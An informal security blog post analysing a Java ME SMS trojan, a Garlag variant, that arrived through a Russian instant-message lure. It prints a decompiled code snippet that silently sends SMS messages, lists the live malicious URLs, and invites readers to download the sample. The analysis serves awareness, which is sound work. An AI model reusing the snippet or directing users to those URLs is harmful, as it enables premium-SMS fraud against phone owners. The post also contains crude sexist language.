“From Russia With(out) Love” or The Story about Unsuccessful Exploitation of Non-existing Mobile Phone ;-)
I was planning to write some technical article during this weekend but some unexpected situation disturbed my Sunday equilibrium. So finally I decided to write about this thing instead. Here's what happened:
Ok, so I am lazy clicking here and there and thinking what to do with my lunch ("grep" on my fridge: it is almost empty) and suddenly, OMG: the window of my IM popping-up and I am seeing the following:
Translating from Russian: some unknown Anna saying: " Hey, look at this picture and see how we had fun by the sea :-)".
I know well enough that "curiosity killed the cat", but look: unknown (presumably totally stunning) Russian beauty is tempting me (me!!!) by mistake or in purpose to see all-her-charms (yamie yame!) right now. Hmm..., let's have some fun. ;)
But "first things first". My advise to you, boys, about initial contact with "previously-unknown" ladies: well... try to arrange the meeting in an environment controlled by you. ;) This may save you from some unhappy surprises (in real life and also in Internet). First thing: I am using the Miranda messenger only. And this means: my IM does exactly what I want, no more no less. This reduces the risk of running some exploits written for a very popular messengers like ICQ, GG, MSN, etc. My own filtering, my own antispam, etc. Second: yes, I am opening the URL mentioned above, but in the FireFox running through the Burp Suite (stopping on each request and response) and with scripts disabled ( we only want to see the pictures of our baby, aren't we...).
Ok, I see that my browser actually wanted to open this URL:
http://byyb.net/l/6149/id47254154
...which redirected me here:
http://regroyal.com/vkontakte/388/id47254154.jar
And now I am really disappointed because my mysterious-Russian-beauty vanished instead trying to make me running some strange java applet. :( Let's see if there is some "whiskey in a jar". The file was immediately downloaded, content unzipped (.jar is actually ZIP file) and analysed (classes were decompiled).
So this is what I found. The classes were written in Java Platform ME (Micro Edition) which is designed for mobile devices. So the .jar suppose to be running on my mobile phone. I found some interesting content in classes: g.class, r.class and x.class.
Look at this:
MessageConnection messageconnection = null;
try
{
c_int_fld++;
TextMessage textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open("sms://" + s)).newMessage("text");
System.out.println("93");
textmessage.setAddress("sms://" + s);
textmessage.setPayloadText(s1);
messageconnection.send(textmessage);
messageconnection.close();
System.out.println("<> SENDED ok");
break label0;
}
catch(Exception exception)
So this thingy definitely is sending SMSs (presumably quite expensive...). When I checked the file with virustotal.com this is what I've seen:
Wooooow, this thing is not funny at all. Check this [direct URL] pointing to the live result of Virustotal analysis.
I also looked for some info in Internet and found very interesting discussion about even more advanced case: http://www.maultalk.com/lofiversion/... (the text is in Russian). Quick translation: unknown lady bitch is starting picking-up some guy on ICQ. He is surprised and wondering it's probably just his girlfriend having fun with him. But the unknown girl is suddenly "becoming hot" and propose to have sex with him. The guy thinks: what the heck? And she sends to him the message "look at my picture and decide" and sends the similar URL as I've got. So now you know what you may get in this case...
I also found that there are several variations of such trojan (actually it's a mutation of the Garlag trojan, first detected in May 2009) which are luring innocent (or stupid) users in different ways... Anyway guys, you may explore this nice piece of malware here [file to download] by yourself, but just beware...
Recent Posts
- Knowledge sharing event: Risk-based approaches to protecting your data – London, Tuesday 19th April
- Training – Hacking and Securing Oracle Database (11g)
- Changed language does not persist when Skype is restarted: how to solve the annoying issue
- More 3D Fun with Kinect and Delphi. You can grab and save still 3D frames!
- Having Fun with Kinect and Delphi (examples of 2D and 3D visualization)
- Smuggling .NET code inside batch files. Impossible? Who said that?
- Cross-site scripting explained (video)
- Innocent comment regarding sensitive information disclosure…
- Pentesting privilege escalation in web applications
- TinyWeb: Pocket-size Portable Web Server With CGI And PHP Support (!)
Popular
Archives
- April 2011 (2)
- January 2011 (1)
- December 2010 (3)
- October 2010 (1)
- September 2010 (8)
- August 2010 (8)
- July 2010 (8)
- June 2010 (2)
Categories
- .NET (1)
- Binary application security (11)
- Cryptography (2)
- Delphi (12)
- Exploitation practice (16)
- Fun (5)
- Java (1)
- Kinect (2)
- Mobile devices security (1)
- Pentesting (15)
- PHP (2)
- Skype (3)
- SQL (5)
- SQL injection (6)
- Uncategorized (9)
- Windows security (6)
Recent Tweets
- No public Twitter messages.
Affiliated websites
